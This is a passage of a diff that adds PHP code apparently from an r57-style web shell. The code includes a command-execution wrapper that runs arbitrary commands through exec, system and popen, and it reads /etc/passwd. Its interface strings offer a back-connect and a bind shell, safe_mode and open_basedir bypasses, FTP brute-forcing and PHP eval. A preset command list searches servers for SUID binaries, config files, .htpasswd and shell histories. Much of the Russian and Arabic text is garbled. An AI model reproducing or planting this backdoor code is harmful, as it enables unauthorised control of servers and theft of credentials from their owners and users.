+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'???? . ???????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+'ru_text111'=>'SQL-?????? : ????',
+'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
+'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
+'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
+'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
+'ru_text116'=>'?????????? ????',
+'ru_text117'=>'?',
+'ru_text118'=>'???? ??????????',
+'ru_text119'=>'?? ??????? ??????????? ????',
+'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
+'ru_err1'=>'??????! ?? ???? ????????? ???? ',
+'ru_err2'=>'??????! ?? ??????? ??????? ',
+'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
+'ru_err4'=>'?????? ??????????? ?? ftp ???????',
+'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
+'ru_err6'=>'??????! ?? ??????? ????????? ??????',
+'ru_err7'=>'?????? ??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'ÇáÇãÑ ÇáãäİĞ',
+'eng_text2' =>'ÊäİíĞ ÇáÇæÇãÑ İí ÇáÓíÑİÑ',
+'eng_text3' =>'ÇãÑ ÇáÊÔÛíá',
+'eng_text4' =>'ãßÇä Úãáß ÇáÇä Úáì ÇáÓíÑİÑ',
+'eng_text5' =>'ÑİÚ ãáİ Çáì ÇáÓíÑİÑ',
+'eng_text6' =>'ãÓÇÑ ãáİß',
+'eng_text7' =>'ÇæÇãÑ ÌÇåÒå',
+'eng_text8' =>'ÇÎÊÑ ÇáÇãÑ',
+'eng_butt1' =>'ÊäİíĞ',
+'eng_butt2' =>'ÑİÜÚ',
+'eng_text9' =>'İÊÍ ÈæÑÊ İí ÇáÓíÑİÑ Úáì /bin/bash',
+'eng_text10'=>'ÈÜæÑÊ',
+'eng_text11'=>'ÈÇÓæÑÏ ááÏÎæá',
+'eng_butt3' =>'İÊÍ',
+'eng_text12'=>'ÃÊÕÜÇá ÚÜßÓí',
+'eng_text13'=>'ÇáÇí Èí',
+'eng_text14'=>'ÇáãäİĞ',
+'eng_butt4' =>'ÃÊÜÕÇá',
+'eng_text15'=>'ÓÍÈ ãáİÇÊ Çáì ÇáÓíÑİÑ',
+'eng_text16'=>'Úä ØÑíŞ',
+'eng_text17'=>'ÑÇÈØ Çáãáİ',
+'eng_text18'=>'ãßÇä äÒæáå',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'ÅÓÊÎÏã',
+'eng_text21'=>'&nbsp;ÇáÇÓã ÇáÌÏíÏ',
+'eng_text22'=>'ÇäÈæÈ ÇáÈíÇäÇÊ',
+'eng_text23'=>'ÇáÈæÑÊ ÇáãÍáí',
+'eng_text24'=>'ÇáÓíÑİÑ ÇáÈÚíÏ',
+'eng_text25'=>'ÇáãäİĞ ÇáÈÚíÏ',
+'eng_text26'=>'ÇÓÊÎÏã',
+'eng_butt5' =>'ÊÔÛíá',
+'eng_text28'=>'ÇáÚãá İí ÇáæÖÚ ÇáÇãä',
+'eng_text29'=>'ããäæÚ ÇáÏÎæá',
+'eng_butt6' =>'ÊÛíÑ',
+'eng_text30'=>'ÚÑÖ ãáİ',
+'eng_butt7' =>'ÚÑÖ',
+'eng_text31'=>'Çáãáİ ÛíÑ ãæÌæÏ',
+'eng_text32'=>'ÊäİíĞ ßæÏ php Úä ØÑíŞ ÏÇáå eval',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'ÇÎÊÈÇÑ',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'ÇáŞÇÚÏÉ . ÇáÌÏæá',
+'eng_text37'=>'ÇÓã ÇáãÓÊÎÏã',
+'eng_text38'=>'ßáãÉ ÇáãÑæÑ',
+'eng_text39'=>'ÇáŞÇÚÏÉ',
+'eng_text40'=>'äÓÎÉ ãä ÌÏÇæá ÇáŞÇÚÏÉ',
+'eng_butt9' =>'äÓÎÉ',
+'eng_text41'=>'ÍİÙ ÇáäÓÎÉ İí',
+'eng_text42'=>'ÊÚÏíá ÇáãáİÇÊ',
+'eng_text43'=>'Çáãáİ ÇáãÑÇÏ ÊÚÏíáå',
+'eng_butt10'=>'ÍİÙ',
+'eng_text44'=>'áÇÊÓÊØíÚ ÇáÊÚÏíá Úáì åĞÇ Çáãáİ İŞØ ÊŞÑÃ',
+'eng_text45'=>'Êã ÇáÍİÙ',
+'eng_text46'=>'ÚÑÖ phpinfo()',
+'eng_text47'=>'ÑÄíÉ ÇáãÊÛíÑÇÊ İí php.ini',
+'eng_text48'=>'ãÓÍ ãáİÇÊ ÇáÜ temp',
+'eng_butt11'=>'ÊÍÑíÑ Çáãáİ',
+'eng_text49'=>'ãÓÍ ÇáÓßÑÈÊ ãä ÇáÓíÑİÑ',
+'eng_text50'=>'ÚÑÖ ãÚáæãÇÊ ÇáĞÇßÑÉ ÇáÑÆíÓíÉ',
+'eng_text51'=>'ÚÑÖ ãÚáæãÇÊ ÇáĞÇßÑÉ',
+'eng_text52'=>'ÈÍË äÕ',
+'eng_text53'=>'İí ÇáãÓÇÑ',
+'eng_text54'=>'ÈÍË Úä äÕ İí ÇáãáİÇÊ',
+'eng_butt12'=>'ÈÍË',
+'eng_text55'=>'İŞØ İí ÇáãáİÇÊ',
+'eng_text56'=>'áÇíæÌÏ :(',
+'eng_text57'=>'ÇäÔÇÁ/ãÓÍ ãáİ/ãÌáÏ',
+'eng_text58'=>'ÇáÇÓã',
+'eng_text59'=>'ãáİ',
+'eng_text60'=>'ãÌáÏ',
+'eng_butt13'=>'ÅäÔÇÁ /ãÓÍ',
+'eng_text61'=>'Êã ÅäÔÇÁ Çáãáİ',
+'eng_text62'=>'Êã ÅäÔÇÁ ÇáãÌáÏ',
+'eng_text63'=>'Êã ãÓÍ Çáãáİ',
+'eng_text64'=>'Êã ãÓÍ ÇáãÌáÏ',
+'eng_text65'=>'ÅäÔÇÁ',
+'eng_text66'=>'ãÓÍ',
+'eng_text67'=>'ÇáÊÕÑíÍ/ÇáãÓÊÎÏã/ÇáãÌãæÚÉ',
+'eng_text68'=>'ÇãÑ',
+'eng_text69'=>'ÅÓã Çáãáİ',
+'eng_text70'=>'ÇáÊÕÑíÍ',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'ÇáäÕ ÇáãÑÇÏ',
+'eng_text73'=>'ÈÍË İí ÇáãÌáÏÇÊ',
+'eng_text74'=>'ÈÍË İí ÇáãáİÇÊ',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'ÇáÈÍË Úä äÕ İí ãáİÇÊ ÈæÇÓØå find',
+'eng_text80'=>'ÇáäæÚ',
+'eng_text81'=>'ÇáÅÊÕÇáÇÊ',
+'eng_text82'=>'ŞæÇÚÏ ÇáÈíÇäÇÊ',
+'eng_text83'=>'ÊÔÛíá ÇãÑ ÇÓÊÚáÇã',
+'eng_text84'=>'ÇÓÊÚáÇã ŞÇÚÏÉ',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'ÊäÒíá ãáİÇÊ ãä ÇáÓíÑİÑ',
+'eng_butt14'=>'ÊÍãíá',
+'eng_text87'=>'ÊäÒíá ãáİÇÊ ãä ÎÇÏã ÇáÇİ Êí Èí',
+'eng_text88'=>'ÓíÑİÑ ÇáÇİ Êí Èí:ÇáãäİĞ',
+'eng_text89'=>'ãáİ İí ÇáÇİ Êí Èí',
+'eng_text90'=>'ÇáÊÍæíá Çáì',
+'eng_text91'=>'ÇÑÔİÉ',
+'eng_text92'=>'ãä ÛíÑ ÇáÇÑÔİÉ',
+'eng_text93'=>'ÇáÇİ Êí Èí',
+'eng_text94'=>'ÊÎãíä ÇáÇİ Êí Èí',
+'eng_text95'=>'ŞÇÆãÉ ÇáãÓÊÎÏãíä',
+'eng_text96'=>'áã íÓÊØÚ ÓÍÈ ŞÇÆãÉ ÇáãÓÊÎÏãíä',
+'eng_text97'=>'Êã ÇáİÍÕ: ',
+'eng_text98'=>'Êã ÈäÌÇÍ: ',
+'eng_text99'=>'* ÇÓÊÎÏã ÇÓãÇÁ ÇáãÓÊÎÏãíä İí ãáİ /etc/passwd áÏÎæá ááÜ ftp',
+'eng_text100'=>'ÇÑÓÇá ãáİ Çáì ÎÇÏã ÇáÇİ Êí Èí',
+'eng_text101'=>'ÇÓÊÎÏã ÇáÇÓÇãí ãÚßæÓå áÊÎãíäåÇ',
+'eng_text102'=>'ÎÏãÇÊ ÇáÈÑíÏ',
+'eng_text103'=>'ÇÑÓÇá ÈÑíÏ',
+'eng_text104'=>'ÇÑÓÇá ãáİ Çáì ÇáÇíãíá',
+'eng_text105'=>'Åáì',
+'eng_text106'=>'ãÜä',
+'eng_text107'=>'ÇáãæÖæÚ',
+'eng_butt15'=>'ÅÑÓÇá',
+'eng_text108'=>'ÇáÑÓÇáÉ',
+'eng_text109'=>'ãÎİí',
+'eng_text110'=>'ÚÑÖ',
+'eng_text111'=>'ÓíÑİÑ ŞæÇÚÏ ÇáÈíÇäÇÊ : ÇáãäİĞ',
+'eng_text112'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ ÏÇáå mb_send_mail',
+'eng_text113'=>'ŞÑÇÆÉ ãÍÊæì ÇáãÌáÏÇÊ Úä ØÑíŞ via imap_list',
+'eng_text114'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ via imap_body',
+'eng_text115'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ compress.zlib://',
+'eng_text116'=>'äÓÎ ãä',
+'eng_text117'=>'Çáì',
+'eng_text118'=>'Êã äÓÎ Çáãáİ',
+'eng_text119'=>'áÇíÓÊØíÚ ÇáäÓÎ',
+'eng_err0'=>'ÎØÇÁ ! áÇíãßä ÇáßÊÇÈÉ Úáì åĞÇ Çáãáİ ',
+'eng_err1'=>'ÎØÇÁ ! ÛíÑ ŞÇÏÑ Úáì ŞÑÇÆå åĞÇ Çáãáİ ',
+'eng_err2'=>'ÎØÇÁ! áÇíãßä ÇáÇäÔÇÁ ',
+'eng_err3'=>'ÎØÇÁ! ÛíÑ ŞÇÏÑ Úáì ÇáÇÊÕÇá ÈÇáÇİ Êí Èí',
+'eng_err4'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇáÏÎæá Çáì ÓíÑİÑ ÇáÇİ Êí Èí',
+'eng_err5'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÊÛíÑ ÇáãÌáÏ İí ÇáÇİ Êí Èí',
+'eng_err6'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇÑÓÇá ÑÓÇáå',
+'eng_err7'=>'ÇáÈÑíÏ ÇÑÓá',
+'eng_text200'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ copy()',
+'eng_text202'=>'ãÓÇÑ Çáãáİ ÇáãÑÇÏ ŞÑÇÆÊå',
+'eng_text300'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ curl()',
+'eng_text302'=>'ãÓÇÑ Çáãáİ ÇáãÑÇÏ ŞÑÇÆÊå',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'ÇáÈÍË Úä ãáİÇÊ suid'=>'find / -type f -perm -04000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ suid İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -04000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ suid'=>'find / -type f -perm -02000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ suid İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -02000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ config.inc.php'=>'find / -type f -name config.inc.php',
+'ÇáÈÍË Úä ãáİÇÊ config.inc.php İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name config.inc.php',
+'ÇáÈÍË Úä ãáİÇÊ config* ÈÌãíÚ ÇáÇãÊÏÇÏÇÊ'=>'find / -type f -name "config*"',
+'ÇáÈÍË Úä ãáİÇÊ config* İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name "config*"',
+'ÇáÈÍË Úä ÇáãáİÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ'=>'find / -type f -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãáİÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ'=>'find /  -type d -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type d -perm -2 -ls',
+'ÇáÈÍË Úä ãáİÇÊ æãÌáÏÇÊ ŞÇÈáÉ ááßÊÇÈÉ'=>'find / -perm -2 -ls',
+'ÇáÈÍË Úä ãáİÇÊ æãÌáÏÇÊ İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -perm -2 -ls',
+'ÇáÈÍË Úä ãáİÇÊ service.pwd'=>'find / -type f -name service.pwd',
+'ÇáÈÍË Úä ãáİÇÊ service.pwd İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name service.pwd',
+'ÇáÈÍË Úä ßá ãáİÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ .htpasswd'=>'find / -type f -name .htpasswd',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .htpasswd',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .bash_history'=>'find / -type f -name .bash_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .bash_history İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .bash_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .mysql_history'=>'find / -type f -name .mysql_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .mysql_history İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .mysql_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .fetchmailrc'=>'find / -type f -name .fetchmailrc',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .fetchmailrc İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .fetchmailrc',
+'ÇÎÑ ãáİÇÊ ãÔÛáå İí ÇáäÙÇã'=>'lsattr -va',
+'ÑÄíÉ ÇáÈæÑÊÇÊ ÇáãİÊæÍÉ İí ÇáÓíÑİÑ'=>'netstat -an | grep -i listen',
+'ÑÄíÉ ÍÇáÉ ÇáãÌáÏÇÊ æÇãßÇäíÉ ÇáÊäİíĞ'=>'cat /etc/fstab',
+'ãÔÇåÏÉ ãáİ ÇááæŞ áÏÎæá ÇáÓí ÈÇäá æÇáãæÇŞÚ Úáì ÇáÓíÑİÑ'=>'cat /var/cpanel/accounting.log',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#000000><font face=tahoma size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=tahoma size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+  {
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;
+  foreach ($rows as $string)
+   {
+           $user = @explode(":",$string);
+           if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users;
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
